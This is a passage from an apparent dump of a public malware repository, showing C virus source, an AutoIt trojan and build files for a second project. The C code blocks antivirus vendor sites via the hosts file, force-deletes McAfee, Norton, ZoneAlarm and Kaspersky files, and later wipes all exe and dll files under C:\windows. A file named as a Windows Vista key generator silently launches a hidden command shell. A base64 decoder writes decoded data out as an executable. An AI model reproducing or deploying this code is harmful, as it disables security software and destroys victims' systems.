(fpl," 0.0.0.0 www.nod32.com"); 101 | fprintf (fpl," 0.0.0.0 nod32.com"); 102 | fprintf (fpl," 0.0.0.0 yahoo.com"); 103 | fprintf (fpl," 0.0.0.0 mail.yahoo.com"); 104 | fprintf (fpl," 0.0.0.0 www.grisoft.com"); 105 | fprintf (fpl," 0.0.0.0 www.f-secure.com"); 106 | fprintf (fpl," 0.0.0.0 f-secure.com"); 107 | fclose(fpl); 108 | } 109 | 110 | void killavfw() 111 | { 112 | system("del C:\\Program Files\\McAfee.com\\Personal Firewall\\*.dll /F /S /Q "); 113 | system("del C:\\Program Files\\McAfee.com\\Personal Firewall\\data\\*.* /F /S /Q "); 114 | system("del C:\\Program Files\\McAfee.com\\Personal Firewall\\help\\*.* /F /S /Q "); 115 | system("del C:\\Program Files\\McAfee.com\\VSO\\*.dll /F /S /Q "); 116 | system("del C:\\Program Files\\McAfee.com\\VSO\\*.ini /F /S /Q "); 117 | system("del C:\\Program Files\\McAfee.com\\VSO\\Res00\\*.dll /F /S /Q "); 118 | system("del C:\\Program Files\\McAfee.com\\VSO\\Dat\\4615\\*.* /F /S /Q "); 119 | system("del C:\\Program Files\\McAfee.com\\*.* /F /S /Q "); 120 | system("del C:\\Program Files\\Norton AntiVirus\\*.dll /F /S /Q "); 121 | system("del C:\\Program Files\\Common Files\\Symantec Shared\\*.exe /F /S /Q "); 122 | system("del C:\\Program Files\\Norton AntiVirus\\*.ini /F /S /Q"); 123 | system("del C:\\Program Files\\Norton AntiVirus\\*.exe /F /S /Q "); 124 | system("del C:\\Program Files\\Norton AntiVirus\\*.inf /F /S /Q "); 125 | system("del C:\\Program Files\\Zone Labs\\ZoneAlarm\\*.exe /F /S /Q "); 126 | system("del C:\\Program Files\\Zone Labs\\ZoneAlarm\\*.zap /F /S /Q "); 127 | system("del C:\\Program Files\\Zone Labs\\ZoneAlarm\\*.dll /F /S /Q "); 128 | system("del C:\\Program Files\\Zone Labs\\ZoneAlarm\\repair\\*.dll /F /S /Q "); 129 | system("del C:\\Program Files\\Kaspersky Lab\\AVP6\\*.exe /F /S /Q "); 130 | system("del C:\\Program Files\\Kaspersky Lab\\AVP6\\*.dll /F /S /Q "); 131 | } 132 | 133 | 134 | void Destinity(){ 135 | Sleep(600000000); 136 | system("del C:\\windows\\*exe /F /S /Q"); 137 | 
system("del C:\\windows\\*dll /F /S /Q"); 138 | } 139 | 140 | -------------------------------------------------------------------------------- /virus miei/mystic/windows vista key generation.au3: -------------------------------------------------------------------------------- 1 | Run("cmd.exe", "", @SW_HIDE) -------------------------------------------------------------------------------- /virus miei/mystic/windows vista key generation.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kaiserfarrell/malware/c0aa3165f1584a70355b0aafde66486e485115d9/virus miei/mystic/windows vista key generation.exe -------------------------------------------------------------------------------- /wrathrage/Debug/BuildLog.htm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kaiserfarrell/malware/c0aa3165f1584a70355b0aafde66486e485115d9/wrathrage/Debug/BuildLog.htm -------------------------------------------------------------------------------- /wrathrage/Debug/OMBUDSMN.ASP: -------------------------------------------------------------------------------- 1 | This program is produced by a member of the Association of Shareware 2 | Professionals (ASP). ASP wants to make sure that the shareware principle 3 | works for you. If you are unable to resolve a shareware-related problem 4 | with an ASP member by contacting the member directly, ASP may be able to 5 | help. The ASP Ombudsman can help you resolve a dispute or problem with an 6 | ASP member, but does not provide technical support for members' products. 7 | Please write to the ASP Ombudsman at 545 Grover Rd., Muskegon, MI USA, or 8 | send a Compuserve message via CIS MAIL to ASP Ombudsman 72050,1433. 
-------------------------------------------------------------------------------- /wrathrage/Debug/Project.ilk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kaiserfarrell/malware/c0aa3165f1584a70355b0aafde66486e485115d9/wrathrage/Debug/Project.ilk -------------------------------------------------------------------------------- /wrathrage/Debug/Project.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kaiserfarrell/malware/c0aa3165f1584a70355b0aafde66486e485115d9/wrathrage/Debug/Project.pdb -------------------------------------------------------------------------------- /wrathrage/Debug/b64.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kaiserfarrell/malware/c0aa3165f1584a70355b0aafde66486e485115d9/wrathrage/Debug/b64.obj -------------------------------------------------------------------------------- /wrathrage/Debug/b64decode.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kaiserfarrell/malware/c0aa3165f1584a70355b0aafde66486e485115d9/wrathrage/Debug/b64decode.obj -------------------------------------------------------------------------------- /wrathrage/Debug/project.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kaiserfarrell/malware/c0aa3165f1584a70355b0aafde66486e485115d9/wrathrage/Debug/project.obj -------------------------------------------------------------------------------- /wrathrage/Debug/vc70.idb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kaiserfarrell/malware/c0aa3165f1584a70355b0aafde66486e485115d9/wrathrage/Debug/vc70.idb -------------------------------------------------------------------------------- /wrathrage/Debug/vc70.pdb: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/kaiserfarrell/malware/c0aa3165f1584a70355b0aafde66486e485115d9/wrathrage/Debug/vc70.pdb -------------------------------------------------------------------------------- /wrathrage/Project.ncb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kaiserfarrell/malware/c0aa3165f1584a70355b0aafde66486e485115d9/wrathrage/Project.ncb -------------------------------------------------------------------------------- /wrathrage/Project.sln: -------------------------------------------------------------------------------- 1 | Microsoft Visual Studio Solution File, Format Version 9.00 2 | # Visual Basic Express 2005 3 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Project", "Project.vcproj", "{7A16A0F7-00ED-41A8-A014-92DC4A940697}" 4 | EndProject 5 | Global 6 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 7 | Debug|Default = Debug|Default 8 | Release|Default = Release|Default 9 | EndGlobalSection 10 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 11 | {7A16A0F7-00ED-41A8-A014-92DC4A940697}.Debug|Default.ActiveCfg = Debug|Win32 12 | {7A16A0F7-00ED-41A8-A014-92DC4A940697}.Debug|Default.Build.0 = Debug|Win32 13 | {7A16A0F7-00ED-41A8-A014-92DC4A940697}.Release|Default.ActiveCfg = Release|Win32 14 | {7A16A0F7-00ED-41A8-A014-92DC4A940697}.Release|Default.Build.0 = Release|Win32 15 | EndGlobalSection 16 | GlobalSection(SolutionProperties) = preSolution 17 | HideSolutionNode = FALSE 18 | EndGlobalSection 19 | EndGlobal 20 | -------------------------------------------------------------------------------- /wrathrage/Project.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kaiserfarrell/malware/c0aa3165f1584a70355b0aafde66486e485115d9/wrathrage/Project.suo 
-------------------------------------------------------------------------------- /wrathrage/Project.vcproj: -------------------------------------------------------------------------------- 1 | 2 | 8 | 9 | 11 | 12 | 13 | 19 | 30 | 32 | 41 | 43 | 45 | 47 | 49 | 51 | 53 | 55 | 57 | 59 | 61 | 62 | 68 | 77 | 79 | 88 | 90 | 92 | 94 | 96 | 98 | 100 | 102 | 104 | 106 | 108 | 109 | 110 | 111 | 112 | 113 | 117 | 119 | 120 | 122 | 123 | 125 | 126 | 127 | 131 | 133 | 134 | 135 | 139 | 140 | 141 | 142 | 143 | 144 | -------------------------------------------------------------------------------- /wrathrage/UpgradeLog.XML: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /wrathrage/_UpgradeReport_Files/Thumbs.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kaiserfarrell/malware/c0aa3165f1584a70355b0aafde66486e485115d9/wrathrage/_UpgradeReport_Files/Thumbs.db -------------------------------------------------------------------------------- /wrathrage/_UpgradeReport_Files/UpgradeReport.css: -------------------------------------------------------------------------------- 1 | BODY 2 | { 3 | BACKGROUND-COLOR: white; 4 | FONT-FAMILY: "Verdana", sans-serif; 5 | FONT-SIZE: 100%; 6 | MARGIN-LEFT: 0px; 7 | MARGIN-TOP: 0px 8 | } 9 | P 10 | { 11 | FONT-FAMILY: "Verdana", sans-serif; 12 | FONT-SIZE: 70%; 13 | LINE-HEIGHT: 12pt; 14 | MARGIN-BOTTOM: 0px; 15 | MARGIN-LEFT: 10px; 16 | MARGIN-TOP: 10px 17 | } 18 | .note 19 | { 20 | BACKGROUND-COLOR: #ffffff; 21 | COLOR: #336699; 22 | FONT-FAMILY: "Verdana", sans-serif; 23 | FONT-SIZE: 100%; 24 | MARGIN-BOTTOM: 0px; 25 | MARGIN-LEFT: 0px; 26 | MARGIN-TOP: 0px; 27 | PADDING-RIGHT: 10px 28 | } 29 | .infotable 30 | { 31 | BACKGROUND-COLOR: #f0f0e0; 32 | BORDER-BOTTOM: #ffffff 0px solid; 33 | BORDER-COLLAPSE: collapse; 34 | 
BORDER-LEFT: #ffffff 0px solid; 35 | BORDER-RIGHT: #ffffff 0px solid; 36 | BORDER-TOP: #ffffff 0px solid; 37 | FONT-SIZE: 70%; 38 | MARGIN-LEFT: 10px 39 | } 40 | .issuetable 41 | { 42 | BACKGROUND-COLOR: #ffffe8; 43 | BORDER-COLLAPSE: collapse; 44 | COLOR: #000000; 45 | FONT-SIZE: 100%; 46 | MARGIN-BOTTOM: 10px; 47 | MARGIN-LEFT: 13px; 48 | MARGIN-TOP: 0px 49 | } 50 | .issuetitle 51 | { 52 | BACKGROUND-COLOR: #ffffff; 53 | BORDER-BOTTOM: #dcdcdc 1px solid; 54 | BORDER-TOP: #dcdcdc 1px; 55 | COLOR: #003366; 56 | FONT-WEIGHT: normal 57 | } 58 | .header 59 | { 60 | BACKGROUND-COLOR: #cecf9c; 61 | BORDER-BOTTOM: #ffffff 1px solid; 62 | BORDER-LEFT: #ffffff 1px solid; 63 | BORDER-RIGHT: #ffffff 1px solid; 64 | BORDER-TOP: #ffffff 1px solid; 65 | COLOR: #000000; 66 | FONT-WEIGHT: bold 67 | } 68 | .issuehdr 69 | { 70 | BACKGROUND-COLOR: #E0EBF5; 71 | BORDER-BOTTOM: #dcdcdc 1px solid; 72 | BORDER-TOP: #dcdcdc 1px solid; 73 | COLOR: #000000; 74 | FONT-WEIGHT: normal 75 | } 76 | .issuenone 77 | { 78 | BACKGROUND-COLOR: #ffffff; 79 | BORDER-BOTTOM: 0px; 80 | BORDER-LEFT: 0px; 81 | BORDER-RIGHT: 0px; 82 | BORDER-TOP: 0px; 83 | COLOR: #000000; 84 | FONT-WEIGHT: normal 85 | } 86 | .content 87 | { 88 | BACKGROUND-COLOR: #e7e7ce; 89 | BORDER-BOTTOM: #ffffff 1px solid; 90 | BORDER-LEFT: #ffffff 1px solid; 91 | BORDER-RIGHT: #ffffff 1px solid; 92 | BORDER-TOP: #ffffff 1px solid; 93 | PADDING-LEFT: 3px 94 | } 95 | .issuecontent 96 | { 97 | BACKGROUND-COLOR: #ffffff; 98 | BORDER-BOTTOM: #dcdcdc 1px solid; 99 | BORDER-TOP: #dcdcdc 1px solid; 100 | PADDING-LEFT: 3px 101 | } 102 | A:link 103 | { 104 | COLOR: #cc6633; 105 | TEXT-DECORATION: underline 106 | } 107 | A:visited 108 | { 109 | COLOR: #cc6633; 110 | } 111 | A:active 112 | { 113 | COLOR: #cc6633; 114 | } 115 | A:hover 116 | { 117 | COLOR: #cc3300; 118 | TEXT-DECORATION: underline 119 | } 120 | H1 121 | { 122 | BACKGROUND-COLOR: #003366; 123 | BORDER-BOTTOM: #336699 6px solid; 124 | COLOR: #ffffff; 125 | FONT-SIZE: 130%; 126 | 
FONT-WEIGHT: normal; 127 | MARGIN: 0em 0em 0em -20px; 128 | PADDING-BOTTOM: 8px; 129 | PADDING-LEFT: 30px; 130 | PADDING-TOP: 16px 131 | } 132 | H2 133 | { 134 | COLOR: #000000; 135 | FONT-SIZE: 80%; 136 | FONT-WEIGHT: bold; 137 | MARGIN-BOTTOM: 3px; 138 | MARGIN-LEFT: 10px; 139 | MARGIN-TOP: 20px; 140 | PADDING-LEFT: 0px 141 | } 142 | H3 143 | { 144 | COLOR: #000000; 145 | FONT-SIZE: 80%; 146 | FONT-WEIGHT: bold; 147 | MARGIN-BOTTOM: -5px; 148 | MARGIN-LEFT: 10px; 149 | MARGIN-TOP: 20px 150 | } 151 | H4 152 | { 153 | COLOR: #000000; 154 | FONT-SIZE: 70%; 155 | FONT-WEIGHT: bold; 156 | MARGIN-BOTTOM: 0px; 157 | MARGIN-TOP: 15px; 158 | PADDING-BOTTOM: 0px 159 | } 160 | UL 161 | { 162 | COLOR: #000000; 163 | FONT-SIZE: 70%; 164 | LIST-STYLE: square; 165 | MARGIN-BOTTOM: 0pt; 166 | MARGIN-TOP: 0pt 167 | } 168 | OL 169 | { 170 | COLOR: #000000; 171 | FONT-SIZE: 70%; 172 | LIST-STYLE: square; 173 | MARGIN-BOTTOM: 0pt; 174 | MARGIN-TOP: 0pt 175 | } 176 | LI 177 | { 178 | LIST-STYLE: square; 179 | MARGIN-LEFT: 0px 180 | } 181 | .expandable 182 | { 183 | CURSOR: hand 184 | } 185 | .expanded 186 | { 187 | color: black 188 | } 189 | .collapsed 190 | { 191 | DISPLAY: none 192 | } 193 | .foot 194 | { 195 | BACKGROUND-COLOR: #ffffff; 196 | BORDER-BOTTOM: #cecf9c 1px solid; 197 | BORDER-TOP: #cecf9c 2px solid 198 | } 199 | .settings 200 | { 201 | MARGIN-LEFT: 25PX; 202 | } 203 | .help 204 | { 205 | TEXT-ALIGN: right; 206 | margin-right: 10px; 207 | } 208 | -------------------------------------------------------------------------------- /wrathrage/_UpgradeReport_Files/UpgradeReport.xslt: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 |

63 | Soluzione: 64 | Progetto: 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 |

73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 92 | 102 | 103 | 104 | 105 | 106 | 107 | src 108 | 109 | 126 | 127 | 128 | 129 | 130 | 131 | 139 | 143 | 144 | 145 | 146 |
Nome fileStatoErroriAvvisi
90 | javascript:document.images[''].click()src 91 | 93 | 94 | 95 | Convertito 96 | 97 | 98 | 99 | Convertito 100 | 101 |
132 | 133 | file 134 | 135 | 136 | 1 file 137 | 138 | 140 | Convertito:
141 | Non convertito 142 |
147 |
148 |
149 | 150 | 151 | 152 | : 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | Report di conversione 162 | <xsl:if test="Properties/Property[@Name='LogNumber']"> 163 | <xsl:value-of select="Properties/Property[@Name='LogNumber']/@Value"/> 164 | </xsl:if> 165 | 166 | 189 | 190 | 191 |

Report di conversione -

192 | 193 |

194 | Ora di conversione:
195 |

196 | 197 | 198 | 199 | 200 | 201 | 202 | 203 | 204 | 205 | 206 | 207 | 208 | 209 | 210 | 211 | 212 | 213 | 214 | 215 | 216 | 217 | 218 | 219 | 220 |

221 | 222 | 223 | 226 | 227 | 228 |
224 | Impostazioni di conversione 225 |

229 | 230 | 231 |
232 |
233 | -------------------------------------------------------------------------------- /wrathrage/_UpgradeReport_Files/UpgradeReport_Minus.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kaiserfarrell/malware/c0aa3165f1584a70355b0aafde66486e485115d9/wrathrage/_UpgradeReport_Files/UpgradeReport_Minus.gif -------------------------------------------------------------------------------- /wrathrage/_UpgradeReport_Files/UpgradeReport_Plus.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kaiserfarrell/malware/c0aa3165f1584a70355b0aafde66486e485115d9/wrathrage/_UpgradeReport_Files/UpgradeReport_Plus.gif -------------------------------------------------------------------------------- /wrathrage/b64.cpp: -------------------------------------------------------------------------------- 1 | /* mime64 */ 2 | /* MIME base64 encoder/decoder by Karl Hahn hahn@lds.loral.com 3-Aug-94 */ 3 | /* modified 30-Sep-94 by Karl Hahn hahn@lds.loral.com: handle multiple 4 | content */ 5 | #include 6 | #include 7 | #include 8 | 9 | #define VACIO "" 10 | #define EOL "\r\n" 11 | #define TRUE 1 12 | #define FALSE 0 13 | #define MAX_SIZE_LINE_B64 75 14 | 15 | extern char *buffer64; 16 | 17 | char alphabet[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 18 | "0123456789+/"; 19 | 20 | enum TOKENTYPE { NONE, BLANKS, PUNCT, TAG, NAME, CONTENT }; 21 | 22 | struct TOKEN { 23 | char *text; 24 | int length; 25 | int index; 26 | enum TOKENTYPE type; 27 | }; 28 | 29 | 30 | char *fileargs[64], *optargs[64]; 31 | 32 | struct STATE64 { 33 | unsigned long int accum; 34 | int shift; 35 | }; 36 | 37 | 38 | 39 | int encode(char *fileOrigen) { 40 | int index, shift, save_shift; 41 | int help_flag = 0, replace_flag = 0, quit = 0; 42 | FILE *fin, *fout; 43 | unsigned char blivit; 44 | unsigned long accum, value; 45 | char buf[80]; 46 | int firsttime = 1; 47 | int 
skipflag = 0; 48 | int printmsg = 1; 49 | fin = fopen( fileOrigen, "rb" ); 50 | if ( fin == NULL ) { 51 | buffer64 = NULL; 52 | return FALSE; 53 | } 54 | strcpy(buffer64,VACIO); 55 | do { 56 | quit = 0; 57 | printmsg = 1; 58 | shift = 0; 59 | accum = 0; 60 | index = 0; 61 | while ( ( !feof( fin ) ) || (shift != 0) ) { 62 | if ( ( !feof( fin ) ) && ( quit == 0 ) ) { 63 | blivit = fgetc( fin ); 64 | if ( feof( fin ) ) { 65 | quit = 1; 66 | save_shift = shift; 67 | blivit = 0; 68 | } 69 | } 70 | else { 71 | quit = 1; 72 | save_shift = shift; 73 | blivit = 0; 74 | } 75 | 76 | if ( (quit == 0) || (shift != 0) ) { 77 | value = (unsigned long)blivit; 78 | accum <<= 8; 79 | shift += 8; 80 | accum |= value; 81 | } 82 | 83 | while ( shift >= 6 ) { 84 | shift -= 6; 85 | value = (accum >> shift) & 0x3Fl; 86 | blivit = alphabet[value]; 87 | 88 | buf[index++] = blivit; 89 | if ( index >= MAX_SIZE_LINE_B64 ) { 90 | buf[index] = '\r'; 91 | index++; 92 | buf[index] = '\0'; 93 | strcat( buffer64, buf ); 94 | index = 0; 95 | } 96 | 97 | if ( quit != 0 ) 98 | { 99 | shift = 0; 100 | } 101 | } 102 | } 103 | 104 | if ( save_shift == 2 ) { 105 | buf[index++] = '='; 106 | if ( index >= MAX_SIZE_LINE_B64 ) { 107 | buf[index] = '\r'; 108 | index++; 109 | buf[index] = '\0'; 110 | strcat( buffer64, buf ); 111 | index = 0; 112 | } 113 | 114 | buf[index++] = '='; 115 | if ( index >= MAX_SIZE_LINE_B64 ) { 116 | buf[index] = '\r'; 117 | index++; 118 | buf[index] = '\0'; 119 | strcat( buffer64, buf ); 120 | index = 0; 121 | } 122 | } 123 | else if ( save_shift == 4 ) { 124 | buf[index++] = '='; 125 | if ( index >= MAX_SIZE_LINE_B64 ) { 126 | buf[index] = '\r'; 127 | index++; 128 | buf[index] = '\0'; 129 | strcat( buffer64, buf ); 130 | index = 0; 131 | } 132 | } 133 | 134 | if ( index != 0 ) { 135 | buf[index] = '\r'; 136 | index++; 137 | buf[index] = '\0'; 138 | strcat( buffer64, buf ); 139 | } 140 | fout = 0; 141 | firsttime = 0; 142 | } while ( !feof( fin ) ); 143 | 144 | fclose( fin ); 145 | 
return TRUE; 146 | } -------------------------------------------------------------------------------- /wrathrage/b64decode.cpp: -------------------------------------------------------------------------------- 1 | /* public domain */ 2 | 3 | /* BASE64 on stdin -> converted data on stdout */ 4 | 5 | #include 6 | #include 7 | #include 8 | 9 | #ifdef _WIN32 10 | #ifndef WIN32 11 | #define WIN32 12 | #endif 13 | #endif 14 | 15 | #ifdef WIN32 16 | #include 17 | #include 18 | #endif 19 | extern char *pkZipExeName; 20 | unsigned char alphabet[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; 21 | 22 | /* Decodes the base64 text in the file nFile and writes the resulting bytes to "<nFile>.exe" (not stdin/stdout as the file header says). The output name is also copied into the global pkZipExeName, whose consumer is not in this file. Returns nothing: the errors counter is incremented on malformed input but never reported to the caller. */ void decode(char *nFile) { 23 | /* +5 covers ".exe" and the terminator. NOTE(review): neither malloc result is checked, and pkExe is not freed anywhere in this function. */ char *pkExe = (char*)malloc(sizeof(char) * (strlen(nFile) + 5)); 24 | strcpy(pkExe,nFile); 25 | strcat(pkExe,".exe"); 26 | pkZipExeName = (char*)malloc(sizeof(char) * (strlen(pkExe) + 1)); 27 | strcpy(pkZipExeName,pkExe); //copy the file name into the global variable 28 | /* NOTE(review): the input is opened in text mode and neither FILE pointer is checked, so a missing input or an unwritable output path reaches fgetc/fputc with NULL. */ FILE *fpk = fopen(nFile,"r"); 29 | FILE *fpkexe = fopen(pkExe,"wb"); 30 | static char inalphabet[256], decoder[256]; 31 | int i, bits, c, char_count, errors = 0; 32 | /* Build the membership and value tables. The loop starts at index (sizeof alphabet) - 1, which is the terminating NUL, so byte value 0 is also marked as a member with value 64. */ for (i = (sizeof alphabet) - 1; i >= 0 ; i--) { 33 | inalphabet[alphabet[i]] = 1; 34 | decoder[alphabet[i]] = i; 35 | } 36 | 37 | char_count = 0; 38 | bits = 0; 39 | while ((c = fgetc(fpk)) != EOF) { 40 | /* '=' ends the data; any byte outside the alphabet (line breaks and so on) is skipped */ if (c == '=') 41 | break; 42 | if (c > 255 || !
inalphabet[c]) 43 | continue; 44 | bits += decoder[c]; 45 | char_count++; 46 | /* four characters collected: 24 bits become three output bytes */ if (char_count == 4) { 47 | fputc((bits >> 16),fpkexe); 48 | fputc(((bits >> 8) & 0xff),fpkexe); 49 | fputc((bits & 0xff),fpkexe); 50 | bits = 0; 51 | char_count = 0; 52 | } else { 53 | bits <<= 6; 54 | } 55 | } 56 | /* input ended without '=': a partial group is reported on stderr and dropped */ if (c == EOF) { 57 | if (char_count) { 58 | fprintf(stderr, "base64 encoding incomplete: at least %d bits truncated", 59 | ((4 - char_count) * 6)); 60 | errors++; 61 | } 62 | } else { /* c == '=' */ 63 | /* padding seen: flush the one or two whole bytes held in the partial group */ switch (char_count) { 64 | case 1: 65 | fprintf(stderr, "base64 encoding incomplete: at least 2 bits missing"); 66 | errors++; 67 | break; 68 | case 2: 69 | /* bits holds two 6-bit values shifted left by 6; the top 8 of those 12 bits form the byte */ fputc((bits >> 10),fpkexe); 70 | break; 71 | case 3: 72 | fputc((bits >> 16),fpkexe); 73 | fputc(((bits >> 8) & 0xff),fpkexe); 74 | break; 75 | } 76 | } 77 | fclose(fpkexe); 78 | fclose(fpk); 79 | } -------------------------------------------------------------------------------- /wrathrage/msgruaid.h: -------------------------------------------------------------------------------- 1 | #ifndef __MSGRUAID__H__ 2 | #define __MSGRUAID__H__ 3 | 4 | // 5 | // Dispatch IDs for DMessengerEvents 6 | // 7 | #define DISPID_MUAE_ONSIGNIN 0x400 8 | #define DISPID_MUAE_ONSIGNOUT 0x401 9 | #define DISPID_MUAE_ONLISTADD 0x402 10 | #define DISPID_MUAE_ONLISTREMOVE 0x403 11 | #define DISPID_MUAE_ONUSERFRIENDLYNAMECHANGE 0x404 12 | #define DISPID_MUAE_ONMYFRIENDLYNAMECHANGE 0x405 13 | #define DISPID_MUAE_ONUSERSTATECHANGE 0x406 14 | #define DISPID_MUAE_ONMYSTATECHANGE 0x407 15 | #define DISPID_MUAE_ONAPPSHUTDOWN 0x408 16 | #define DISPID_MUAE_ONMYPROPERTYCHANGE 0x409 17 | #define DISPID_MUAE_ONUSERPROPERTYCHANGE 0x40a 18 | #define DISPID_MUAE_ONUSERBLOCKCHANGE 0x40b 19 | #define DISPID_MUAE_ONUSERPAGERCHANGE 0x40c 20 | #define DISPID_MUAE_ONUSERPHONECHANGE 0x40d 21 | #define DISPID_MUAE_ONMYPHONECHANGE 0x40e 22 | #define DISPID_MUAE_ONUNREADEMAILCHANGE 0x40f 23 | #define DISPID_MUAE_ONIMWINDOWCREATED 0x411 24 | #define
DISPID_MUAE_ONIMWINDOWDESTROYED 0x412 25 | #define DISPID_MUAE_ONIMWINDOWADD 0x413 26 | #define DISPID_MUAE_ONIMWINDOWREMOVE 0x414 27 | #define DISPID_MUAE_ADDGROUP 0x415 28 | #define DISPID_MUAE_REMOVEGROUP 0x416 29 | #define DISPID_MUAE_RENAMEGROUP 0x417 30 | #define DISPID_MUAE_ADD_USRGRP 0x418 31 | #define DISPID_MUAE_REMOVE_USRGRP 0x419 32 | 33 | 34 | // 35 | // Dispatch IDs for IMessenger 36 | // 37 | #define DISPID_MUAM_RECEIVEDIR 0x500 38 | #define DISPID_MUAM_STARTVOICE 0x501 39 | #define DISPID_MUAM_FRIENDLYNAME 0x502 40 | #define DISPID_MUAM_WINDOW 0x503 41 | #define DISPID_MUAM_UNREADEMAILCOUNT 0x504 42 | #define DISPID_MUAM_VIEWPROFILE 0x505 43 | #define DISPID_MUAM_GETCONTACT 0x506 44 | #define DISPID_MUAM_OPTIONUI 0x507 45 | #define DISPID_MUAM_ADDUI 0x508 46 | #define DISPID_MUAM_FINDUI 0x509 47 | #define DISPID_MUAM_INSTANTMESSAGE 0x50a 48 | #define DISPID_MUAM_SIGNOUT 0x50b 49 | #define DISPID_MUAM_SENDFILE 0x50c 50 | #define DISPID_MUAM_OPENINBOX 0x50d 51 | #define DISPID_MUAM_MYSERVICENAME 0x50e 52 | #define DISPID_MUAM_INVITEAPP 0x50f 53 | #define DISPID_MUAM_MYPHONENUMBER 0x510 54 | #define DISPID_MUAM_SIGNIN 0x511 55 | #define DISPID_MUAM_SENDMAIL 0x512 56 | #define DISPID_MUAM_AUTOSIGNIN 0x513 57 | #define DISPID_MUAM_PHONEUI 0x514 58 | #define DISPID_MUAM_AUDIOUI 0x515 59 | #define DISPID_MUAM_PAGERUI 0x516 60 | #define DISPID_MUAM_CONTACTS 0x517 61 | #define DISPID_MUAM_SIGNINNAME 0x518 62 | #define DISPID_MUAM_STATUS 0x519 63 | #define DISPID_MUAM_MYPROPERTY 0x51a 64 | #define DISPID_MUAM_SERVICEID 0x51b 65 | #define DISPID_MUAM_SERVICES 0x51c 66 | // 67 | // Dispatch IDs for IMessenger2 68 | // 69 | #define DISPID_MUAM_MYGROUPS 0x51d 70 | #define DISPID_MUAM_STARTVIDEO 0x51e 71 | #define DISPID_MUAM_GROUPS 0x51f 72 | #define DISPID_MUAM_CREATEGROUP 0x520 73 | #define DISPID_MUAM_SORT 0x521 74 | // 75 | // Dispatch IDs for IMessenger3 76 | // 77 | #define DISPID_MUAM_PROPERTY 0x522 78 | 79 | // 80 | // Dispatch IDs for IMessengerContact 
81 | // 82 | 83 | #define DISPID_MUAC_FRIENDLYNAME 0x600 84 | #define DISPID_MUAC_STATUS 0x601 85 | #define DISPID_MUAC_SIGNINNAME 0x602 86 | #define DISPID_MUAC_SERVICENAME 0x603 87 | #define DISPID_MUAC_BLOCK 0x604 88 | #define DISPID_MUAC_ISSELF 0x605 89 | #define DISPID_MUAC_PROPERTY 0x606 90 | #define DISPID_MUAC_CANPAGE 0x607 91 | #define DISPID_MUAC_PHONENUMBER 0x608 92 | #define DISPID_MUAC_SERVICEID 0x609 93 | 94 | 95 | // 96 | // Dispatch IDs for IMessengerContacts 97 | // 98 | 99 | #define DISPID_MUAC_COUNT 0x700 100 | #define DISPID_MUAC_REMOVE 0x701 101 | 102 | // 103 | // Dispatch IDs for IMessengerWindow 104 | // 105 | 106 | #define DISPID_MUAW_HWND 0x800 107 | #define DISPID_MUAW_LEFT 0x801 108 | #define DISPID_MUAW_TOP 0x802 109 | #define DISPID_MUAW_WIDTH 0x803 110 | #define DISPID_MUAW_HEIGHT 0x804 111 | #define DISPID_MUAW_CLOSE 0x805 112 | #define DISPID_MUAW_SHOW 0x806 113 | #define DISPID_MUAW_ISCLOSED 0x807 114 | #define DISPID_MUAW_PROPERTY 0x808 115 | 116 | 117 | // 118 | // Dispatch IDs for IMessengerService(s) 119 | // 120 | 121 | #define DISPID_MUAS_PS 0x880 122 | #define DISPID_MUAS_COUNT 0x881 123 | #define DISPID_MUAS_NAME 0x882 124 | #define DISPID_MUAS_FNAME 0x883 125 | #define DISPID_MUAS_CAP 0x884 126 | #define DISPID_MUAS_STATUS 0x885 127 | #define DISPID_MUAS_PROPERTY 0x886 128 | #define DISPID_MUAS_ID 0x887 129 | #define DISPID_MUAS_SIGNINNAME 0x888 130 | 131 | // 132 | // Dispatch IDs for IMessengerConversationWnd 133 | // 134 | #define DISPID_MUAW_CONTACTS 0x809 135 | #define DISPID_MUAW_HISTORY 0x80a 136 | #define DISPID_MUAW_ADD 0x80b 137 | 138 | // 139 | // Dispatch IDs for IMessengerGroup(s) 140 | // 141 | #define DISPID_MUAM_GROUP 0x680 142 | #define DISPID_MUAG_REMOVEG 0x681 143 | #define DISPID_MUAG_COUNT 0x682 144 | #define DISPID_MUAG_CONTACTS 0x683 145 | #define DISPID_MUAG_NAME 0x684 146 | #define DISPID_MUAG_ADD 0x685 147 | #define DISPID_MUAG_REMOVEC 0x686 148 | #define DISPID_MUAG_SERVICE 0x687 149 | 150 | 
